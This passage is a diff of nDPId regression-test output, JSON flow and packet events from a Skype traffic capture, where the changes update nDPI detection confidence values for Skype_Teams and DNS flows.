+00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":938,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970667913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":939,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970667913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":939,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":1431970667913,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431970667913,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4i7gAAEARb8PAqAEib91NkjLdgQkAJGEVe3UC\/j9SXtMCBQsEGLuepyVsXxpYMSM\/UQo5ag=="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":939,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970667913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":939,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970667913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":941,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668278,"flow_last_seen":1431970668278,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970668278,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63342,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":941,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":1,"flow_last_seen":1431970668278,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970668278,"pkt":"0NQSxnP1PBXCt3IOCABFAABA6QgAAEARDjHAqAEiwKgBAfduADUALM6fTeoBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAAQAB"} 
-00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":941,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668278,"flow_last_seen":1431970668278,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970668278,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63342,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":941,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668278,"flow_last_seen":1431970668278,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970668278,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63342,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":942,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668278,"flow_last_seen":1431970668278,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970668278,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64258,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":942,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":1431970668278,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970668278,"pkt":"0NQSxnP1PBXCt3IOCABFAABAkhAAAEARZSnAqAEiwKgBAfsCADUALD+l2TUBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAHAAB"} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":942,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668278,"flow_last_seen":1431970668278,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970668278,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64258,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":942,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668278,"flow_last_seen":1431970668278,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970668278,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64258,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":952,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668514,"flow_last_seen":1431970668514,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970668514,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":51259,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":952,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":1431970668514,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970668514,"pkt":"0NQSxnP1PBXCt3IOCABFAABAux9AAEAGAGPAqAEib91Njsg7Abv27osgAAAAALAC\/\/8jHQAAAgQFtAEDAwUBAQgKPjIKcgAAAAAEAgAA"} 
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":953,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668514,"flow_last_seen":1431970668514,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970668514,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51260,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -560,61 +560,61 @@ 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":974,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":3,"flow_last_seen":1431970668803,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970668803,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0qSRAAEAGEmrAqAEib91Njsg7Abv27oshEKH0yoAQECzoZgAAAQEICj4yC49NkBYw"} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":978,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970668973,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.166","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":978,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":1,"flow_last_seen":1431970668973,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431970668973,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1LlEAAEARAb\/AqAEinTfrpjLdnE8AIZ69e3cC3u8ghDSSA4Gtev71JCe8ggQmBcfTOg=="} 
-00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":978,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970668973,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.166","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":978,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970668973,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.166","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":979,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970668973,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":979,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":1,"flow_last_seen":1431970668973,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431970668973,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyB6AAAEARJ\/jAqAEi1cezkTLdnFgAHgsae3kCyqgAJfxhjLbJRJUrPtsodh20jg=="} -00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":979,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970668973,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":979,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970668973,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":980,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970668973,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.42","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":980,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":1,"flow_last_seen":1431970668973,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431970668973,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+wKIAAEAR1+DAqAEiQTffKjLdnFgAKi+se3sC0K9BEnPeD0WuBXXm5wareR+WL1\/qIQP+x9YGu9Sm5Q=="} -00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":980,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970668973,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.42","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":980,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970668973,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.42","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":988,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":2,"flow_last_seen":1431970669372,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970669372,"pkt":"0NQSxnP1PBXCt3IOCABFAABA35sAAEARF57AqAEiwKgBAfduADUALM6fTeoBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAAQAB"} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":989,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":2,"flow_last_seen":1431970669372,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970669372,"pkt":"0NQSxnP1PBXCt3IOCABFAABAIWEAAEAR1djAqAEiwKgBAfsCADUALD+l2TUBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAHAAB"} 
00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":992,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970669927,"flow_last_seen":1431970669927,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970669927,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":992,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":1,"flow_last_seen":1431970669927,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431970669927,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2E64AAEARG+XAqAEi1cezkjLdnF4AIuLme30CQ7dH2z2v6k8Do\/cqwHkYPEueogZ7yfU="} -00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":992,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970669927,"flow_last_seen":1431970669927,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970669927,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":992,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970669927,"flow_last_seen":1431970669927,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970669927,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":993,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970669927,"flow_last_seen":1431970669927,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970669927,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":993,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":1,"flow_last_seen":1431970669927,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431970669927,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9jJkAAEARWu7AqAEinTg0JjLdnE8AKRAHe38C0EXr0Mxbt14LCxM+eOaK\/XZWtSRnQDNWL9r8hWuf"} 
-00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":993,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970669927,"flow_last_seen":1431970669927,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970669927,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":993,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970669927,"flow_last_seen":1431970669927,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970669927,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1001,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970670304,"flow_last_seen":1431970670304,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970670304,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":61095,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1001,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":1,"flow_last_seen":1431970670304,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970670304,"pkt":"0NQSxnP1PBXCt3IOCABFAABL\/QYAAEAR+ifAqAEiwKgBAe6nADUAN3lCuqsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} -00801{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1001,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970670304,"flow_last_seen":1431970670304,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970670304,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":61095,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00801{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1001,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970670304,"flow_last_seen":1431970670304,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970670304,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":61095,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": 
